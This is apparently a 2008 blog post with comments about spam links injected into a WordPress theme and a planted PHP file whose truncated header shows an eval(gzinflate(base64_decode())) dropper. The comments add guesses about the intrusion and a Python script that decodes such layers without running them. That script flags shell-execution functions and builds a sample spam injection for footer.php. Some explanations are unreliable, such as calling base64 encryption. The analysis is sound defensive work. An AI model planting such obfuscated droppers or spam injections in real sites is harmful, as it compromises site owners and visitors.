Fucking spammers. Today I found a mountain of spam links for crap like zyrtec and zithromax in my footers.php. All the links forward to canadian-meds-shop.com. These are bad people: scammers and thieves.
I also found a strange file in my WordPress theme file, 1.php. The file started like this:
<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
$md5_pass = ""; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//
I don’t know how this file got there or what it does but I’m pretty sure it’s bad stuff.
Do you want to try and figure out what this evil f’ing spam program does? Here is the virus file. Caution! This is a bad program!
Tell me what you find out, would you?
Now I’ve got to figure out how they got on my system…. grrrrrr.

October 2nd, 2008 at 9:54 am
Base64 is a method of encryption/decryption.
The virus is actually a script that includes a "binary" executable in the form of text, using base64 encryption. The PHP code uses the eval method of calling the
To evaluate what the program does, you must decrypt the code, saving into binary, then you must reverse engineer or run in a "safe thread" that can be evaluated for its purposes.
The attack on your server was simple: use a web form provided on your site to feed garbage data until the server executes that data, saving a file into the web folder. Then, the attacker calls the program directly using the URL to the script… and if your server isn’t locked down just right, it will run.. injecting a binary into memory.. and they are in.
Attackers tend to find security flaws in common free programs like blog scripts, then will find blogs on the web, then attack them.
October 7th, 2008 at 1:23 pm
Most all blog hacks are from people not upgrading their blog software.
If you don't make a ton of changes, just back up your template one time, then create or download a script to email you a database dump every couple of days.
Hacker Forums
October 9th, 2008 at 9:59 pm
Hey Hacker Forums, my blog and all the plugins are fully up to date, but good try. :-(
Thanks for the comment and SEO. I’m not so keen on the self-promotion so I edited your links.
October 10th, 2008 at 7:17 am
Try to print out the source with something like
<?php echo gzinflate(base64_decode('HJ3…')); ?>
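Taking that suggestion a step further, here is an added example (my own, not code from the post or any commenter) that peels the eval(gzinflate(base64_decode(...))) wrapper off a file like 1.php without ever executing it, repeating for nested layers, and then lists the PHP functions in the decoded text that a webshell typically leans on. The payload it unwraps is a constructed stand-in built by wrap(), not the base64 blob from the post.

```python
import base64
import re
import zlib

# The dropper shape from the post: eval(gzinflate(base64_decode('...')))
LAYER_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)

# Functions worth a second look once the wrapper is gone (not an exhaustive list).
WATCH_LIST = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open",
              "move_uploaded_file", "fwrite", "file_put_contents", "eval")


def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate() is raw DEFLATE with no zlib/gzip header, hence wbits=-15."""
    return zlib.decompress(data, -15)


def unwrap(php_source: str, max_layers: int = 20):
    """Strip eval(gzinflate(base64_decode(...))) layers by decoding only, never eval.
    Returns (decoded_source, layers_removed)."""
    current, layers = php_source, 0
    while layers < max_layers:
        m = LAYER_RE.search(current)
        if not m:
            break
        try:
            current = gzinflate(base64.b64decode(m.group(1))).decode("utf-8", "replace")
        except (ValueError, zlib.error) as exc:  # bad base64 or bad deflate stream
            raise ValueError(f"layer {layers + 1} did not decode: {exc}")
        layers += 1
    return current, layers


def suspicious_calls(decoded: str):
    """Names from WATCH_LIST that appear as function calls in the decoded source."""
    return sorted(n for n in WATCH_LIST if re.search(rf"\b{n}\s*\(", decoded, re.IGNORECASE))


def wrap(php_source: str, layers: int = 1) -> str:
    """Constructed test helper: wrap source the same way the dropper does (raw DEFLATE + base64)."""
    current = php_source
    for _ in range(layers):
        comp = zlib.compressobj(9, zlib.DEFLATED, -15)
        raw = comp.compress(current.encode()) + comp.flush()
        current = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(raw).decode()
    return current


# Constructed sample body, mirroring the spam-link injection into footer.php described above.
SAMPLE_INNER = '<?php $login = ""; $pass = ""; file_put_contents("footer.php", "<a href=\\"#\\">spam</a>", FILE_APPEND); ?>'
```

Run unwrap() on the real 1.php contents and feed the result back in if the decoded text still contains an eval wrapper; the function already loops for you up to max_layers.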
November 7th, 2008 at 9:40 am
Hey Lee,
Thanks for posting this. I found it by searching the first several characters of the base_64/gz hash. Same thing happened to me, just different file names. Nothing harmed other than the file placement. I have a Joomla site.
I am wondering if you found out how the file was placed.
I only have http/error logs to go by, and I cannot determine the MO from it.
I have the IP of my offender, if you wish to compare notes, but I am more interested in the How than the Who right now.
Thanks!
November 7th, 2008 at 10:35 am
Patrick, I haven't figured out how this file got there. All I've really done so far is change my WordPress password, and I haven't gotten another attack. I wish I had a better answer. :-(